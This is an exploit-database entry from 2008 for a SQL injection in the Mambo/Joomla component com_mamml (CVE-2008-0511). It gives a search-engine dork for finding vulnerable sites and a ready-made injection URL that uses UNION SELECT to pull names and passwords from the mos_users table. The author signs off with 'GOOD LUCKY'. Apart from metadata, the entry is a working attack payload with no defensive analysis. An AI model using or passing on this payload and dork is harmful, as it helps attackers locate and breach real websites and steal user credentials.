Mambo Component 'com_mamml' - 'listid' SQL Injection

Author: S@BUN
type: webapps
platform: php
port: 
date_added: 2008-01-28 
date_updated: 2016-10-28 
verified: 1 
codes: OSVDB-41270;CVE-2008-0511 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################################
#
# joomla SQL Injection(com_mamml)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_mamml"
#
########################################################################
EXPLOIT :

index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

#########################################################################
# S@BUN                  www.hackturkiye.com                  S@BUN

#########################################################################
#########################################################################
# S@BUN                       GOOD LUCKY                       S@BUN
#########################################################################

# milw0rm.com [2008-01-29]